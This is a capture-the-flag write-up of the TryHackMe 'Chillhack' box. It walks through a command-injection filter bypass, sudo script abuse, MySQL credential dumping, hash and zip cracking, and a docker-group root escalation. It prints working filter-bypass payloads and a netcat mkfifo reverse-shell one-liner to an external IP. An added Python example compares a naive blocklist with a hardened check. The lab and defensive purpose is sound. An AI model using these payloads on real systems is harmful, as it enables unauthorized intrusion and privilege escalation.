Chillhack is a medium level challenge on TryHackMe. The start of the challenge requires finding a command injection filter bypass to get an initial shell. From that shell, you can execute a script with sudo whose input fields can be manipulated to elevate to another user. As the other user, I find a MySQL database and a new web service running. After finding credentials for the MySQL database, you can dump hashes for the new web service. Cracking these and logging into the web service provides only an image. Downloading this image, I find it hides a password protected zip file. Using zip2john I crack this zip file and find another password for a new user. Logging in as this user, I find they are part of the docker group, which I use to elevate to root.

Let's find out:

Starting off with an nmap scan, I find FTP, SSH and HTTP are open.

Logging into FTP, I find a file named note.txt.

Downloading and reading note.txt, I learn that certain strings are being filtered somewhere.

After looking at the website in the browser, I see a lot of dead links.

Running gobuster, I find the /secret page.

Navigating to the /secret page, I see a text field with an execute button.

Exploitation

Under /secret I try to execute a command. Testing whoami, I find it executes.

Trying other commands, I see there is some sort of filtering going on, as I get an error message when trying to run cat /etc/passwd.

I want to bypass this filtering, so I try different payloads. Trying the first option, cat</etc/passwd, I find it works: the filter is bypassed and the command executes.

Since whoami runs without issue, I also test double quotes inside the cat command. My payload is c"a"t /etc/passwd, and this works too.

Next I want to use this bypass to get a reverse shell. The most reliable option is the second netcat one, and a single quoted character is enough to get past the filter. My final payload is r"m" /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.212.142 1234 >/tmp/f. After setting up a nc listener, I gain a reverse shell by executing this.
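All three payloads above defeat the same weakness: a blocklist compared against the raw input rather than against what /bin/sh actually runs. The following Python is an added example, not code from the writeup or the box; it models the vulnerable check as a blocklist matched word by word against the space-split input (an assumption consistent with the bypasses reported here, since the real filter source is not shown) and places a defensive check beside it that tokenises the input the way the shell does before applying the same list.

```python
import os
import shlex

# Constructed blocklist for illustration. The page only shows that cat is
# filtered and whoami is not; the box's real list is not reproduced here.
BLOCKED = {"cat", "nc", "rm", "sh"}


def naive_filter(cmd: str) -> bool:
    """Model of the weak check (assumed behaviour): split the raw input on
    spaces and reject only exact word matches. True means 'allowed'."""
    return not any(word in BLOCKED for word in cmd.split(" "))


def shell_words(cmd: str) -> list:
    """Tokenise like /bin/sh: quotes are removed and ; | & < > become
    separate tokens, so c"a"t becomes cat and cat</etc/passwd splits."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def command_names(cmd: str) -> list:
    """Basename of every word in command position: the first word of the
    line and the first word after each ; | & operator. A token following a
    redirection operator is a filename and is skipped."""
    names, expect_cmd, skip_next = [], True, False
    for tok in shell_words(cmd):
        if tok and all(c in ";|&" for c in tok):      # ; | & && || : new command
            expect_cmd = True
        elif tok and all(c in "<>&|" for c in tok):   # < > >& 2>&1 : redirection
            skip_next = True
        elif skip_next:
            skip_next = False
        elif expect_cmd:
            names.append(os.path.basename(tok))
            expect_cmd = False
    return names


def normalized_filter(cmd: str) -> bool:
    """Hardened check: apply the blocklist to what the shell would run.
    Still a blocklist; the real fix is never handing user input to a shell."""
    return not any(name in BLOCKED for name in command_names(cmd))


# The probes and payloads used in the writeup, in order.
PAYLOADS = [
    "whoami",
    "cat /etc/passwd",
    "cat</etc/passwd",
    'c"a"t /etc/passwd',
    'r"m" /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.212.142 1234 >/tmp/f',
]

if __name__ == "__main__":
    for p in PAYLOADS:
        print(f"naive={naive_filter(p)!s:5} normalized={normalized_filter(p)!s:5} {p}")
```

Only cat /etc/passwd is rejected by the word-split model, matching the behaviour the writeup observed, while the tokenising check rejects all four filtered payloads and still allows whoami.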

Getting apaar User

Before proceeding, I upgrade my shell using python3.

Going into the home directory, I find there are 3 folders, but only one of them can be opened.

Before starting my enumeration, I first check whether I can run any commands with sudo. Here, I find I can run a script named .helpline.sh as apaar.

After reading this file, I see it prompts for two inputs and redirects errors to /dev/null.

This script appears to execute the second input as a command. To test this, I run the script as apaar and enter /bin/sh, which logs me in as apaar.

I upgrade the shell with python3 again.

I can read the local.txt file, which holds our first flag.

Privilege Escalation

Finding MySQL credentials

As apaar, I run LinEnum.sh to find out more about the box. I serve the script with a python HTTP server on my local machine and fetch it on the target using curl.

I found two internal ports, 9001 and 3306, that were not shown in the nmap scan.

I already knew that 3306 is a SQL server, but I was not sure about 9001, so I decided to set up port forwarding. For that, I need to generate SSH keys on my local machine.

This generates two files, id_rsa and id_rsa.pub. I take the contents of id_rsa.pub and put them in the authorized_keys file under /home/apaar/.ssh.

Now I am ready to set up port forwarding on port 9001.

I can now access port 9001 on 127.0.0.1. Here I find a website with a login portal.

I need a username and password, so I check whether there are any hardcoded credentials. Under /var/www I find a files directory, and looking through it I find hardcoded credentials in the index.php file.

Using these credentials, I can log in to MySQL.

In the MySQL server, I find a database named webportal.

This database contains only one table, so I dump its contents and get two usernames with their hashes.

Let's save these two hashes.

Now let's crack these two hashes with john.

Now I have two usernames and two passwords. Testing both, I can log in on port 9001, but all I find is an image and some text.

I download the image and use steghide to extract hidden data, which produces a file named “Backup.zip”.

This zip file is password protected, and I can crack the password using zip2john.

Now I can unzip backup.zip, and inside it I find another file, source_code.zip.

In this file, there is a base64 encoded password.

Decoding the base64 gives the password.

Using this password, I find I can log in as anurodh.

I run LinEnum.sh again as the new user.

This user is part of the docker group.

Looking on GTFOBins, I see a possible docker shell escape to get root. Running it gives me a root shell.

Now that I am root, I can read proof.txt.
